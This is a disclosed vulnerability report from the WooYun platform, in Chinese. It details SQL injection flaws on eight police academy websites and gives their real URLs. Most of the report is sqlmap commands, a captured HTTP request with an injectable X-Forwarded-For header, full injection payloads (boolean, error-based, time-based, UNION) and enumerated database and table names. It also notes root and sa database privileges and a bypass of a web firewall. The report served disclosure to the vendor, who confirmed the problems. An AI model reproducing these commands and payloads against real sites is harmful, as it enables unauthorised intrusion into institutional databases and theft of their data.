当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108779

漏洞标题:对各省公安院校网站的sql注入漏洞检测结果

相关厂商:多省公安院校

漏洞作者: B1gstar

提交时间:2015-04-23 12:11

修复时间:2015-06-08 08:54

公开时间:2015-06-08 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-23: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

对各省警校网站的一次blind sql inject(轻量级)检测,发现8校注入点,以中国人民公安大学为首。

详细说明:

1、中国人民公安大学
http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 驾校这个目录下还有其他注入点。

[root@bijiben sqlmapproject-sqlmap-1e7f2d6]# python sqlmap.py -u http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150407}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:51:06
[12:51:07] [INFO] testing connection to the target URL
[12:51:10] [INFO] testing if the target URL is stable. This can take a couple of seconds
[12:51:11] [INFO] target URL is stable
[12:51:11] [INFO] testing if GET parameter 'id' is dynamic
[12:51:12] [INFO] confirming that GET parameter 'id' is dynamic
[12:51:12] [WARNING] GET parameter 'id' does not appear dynamic
[12:51:12] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:51:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads spy
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[12:51:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:51:35] [WARNING] reflective value(s) found and filtering out
[12:51:37] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[12:51:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[12:51:37] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[12:51:37] [INFO] testing 'MySQL inline queries'
[12:51:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:51:38] [WARNING] time-based comparison requires larger statistical model, please wait..................
[12:51:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:51:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:51:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:51:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:51:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:51:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[12:52:01] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
[12:52:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:52:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:52:02] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:52:04] [INFO] target URL appears to have 4 columns in query
[12:52:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=40 AND 8982=8982
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=40 AND (SELECT 4681 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(4681=4681,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=40 AND (SELECT * FROM (SELECT(SLEEP(5)))DrJH)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-2687 UNION ALL SELECT NULL,NULL,CONCAT(0x7178787171,0x5347686e514c754c7671,0x71767a7071),NULL-- 
---
[12:53:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ColdFusion, Apache 2.0.61
back-end DBMS: MySQL 5.0
[12:53:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 17 times
[12:53:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.cppsu.edu.cn'


dbs.png


user2.png


2、福建警察学校
http://www.fjpsc.edu.cn/admin/ad_login.aspx http头注入,参数:X-Forwarded-For
抓包:

GET /admin/ad_login.aspx HTTP/1.1
Host: www.fjpsc.edu.cn
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=shknhgmcllhrc5hrwdson4m3
X-Forwarded-For: 1*
Connection: keep-alive


python sqlmap.py -r fujian.txt --level 3 --risk

fujian1.png


fujian2.png


3、吉林警察学院
python sqlmap.py -u 'http://www.jljcxy.com/thirdparty/apprise/testdetail.jsp?s=1' root用户

jilin.png


[10:55:06] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:55:06] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


Database: cms
[63 tables]
+-----------------------+
| jc_acquisition        |
| jc_advertising        |
| jc_advertising_attr   |
| jc_advertising_space  |
| jc_channel            |
| jc_channel_attr       |
| jc_channel_ext        |
| jc_channel_txt        |
| jc_channel_user       |
| jc_chnl_group_contri  |
| jc_chnl_group_view    |
| jc_comment            |
| jc_comment_ext        |
| jc_config             |
| jc_config_attr        |
| jc_content            |
| jc_content_attachment |
| jc_content_attr       |
| jc_content_channel    |
| jc_content_check      |
| jc_content_count      |
| jc_content_ext        |
| jc_content_group_view |
| jc_content_picture    |
| jc_content_tag        |
| jc_content_topic      |
| jc_content_txt        |
| jc_content_type       |
| jc_contenttag         |
| jc_friendlink         |
| jc_friendlink_ctg     |
| jc_group              |
| jc_guestbook          |
| jc_guestbook_ctg      |
| jc_guestbook_ext      |
| jc_keyword            |
| jc_log                |
| jc_model              |
| jc_model_item         |
| jc_role               |
| jc_role_permission    |
| jc_sensitivity        |
| jc_site               |
| jc_site_attr          |
| jc_site_cfg           |
| jc_site_model         |
| jc_site_txt           |
| jc_topic              |
| jc_user               |
| jc_user_ext           |
| jc_user_role          |
| jc_user_site          |
| jc_vote_item          |
| jc_vote_record        |
| jc_vote_topic         |
| jo_authentication     |
| jo_config             |
| jo_ftp                |
| jo_template           |
| jo_upload             |
| jo_user               |
| my_apprise            |
| my_apprise_date       |
+-----------------------+


还有注入点:
http://www.jljcxy.com/thirdparty/apprise/pingbi.jsp 中ipt_date_end 和 ipt_date_start 两个参数存在post注入
学校分站 jiaoyu.jljcxy.com/jiaoyu/Login_xsmm.asp,XH参数post注入
4、四川警察学院
分站http://lib.scpolicec.edu.cn/admin/show-test2.asp?id=221

Screenshot-1.png


5、云南警官学院
python sqlmap.py -u http://210.40.208.4/sbweb/chk.asp --data="uid=" sa权限!! post注入

Screenshot.png


dbs.png


6、安徽警官职业学院
sqlmap可直接绕过web防火墙检测漏洞存在
python sqlmap.py -u http://chengji.ahjgxy.com/webzsjs/show.aspx?id=11
python sqlmap.py -u http://chengji.ahjgxy.com/webzsjs/subpage1.aspx?strNo=bc1
要进一步获取数据库信息的话,应该需要更改代码。

anhui1.png


7、陕西警官职业学院
python sqlmap.py -u http://www.sxjgxy.edu.cn/www/content.asp?leaf_id=4248

shanxi1.png


8、台湾警察专科学校的注入点
python sqlmap.py -u "http://ipac.tpa.edu.tw:82/ipac20/ipac.jsp?session=1B293V4020187.3159&menu=search&aspect=basic&npp=10&ipp=20&profile=tpalib&ri=&term=1111&index=.GW&x=8&y=17&aspect=basic" -p "profile" 只是证明了注入点存在。

tw1.png


漏洞证明:

同上

修复方案:

过滤,给我新手多点rank好不好。毕竟这么多站点也蛮累的。

版权声明:转载请注明来源 B1gstar@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-04-24 08:54

厂商回复:

验证确认所描述的问题,已通知修复。

最新状态:

暂无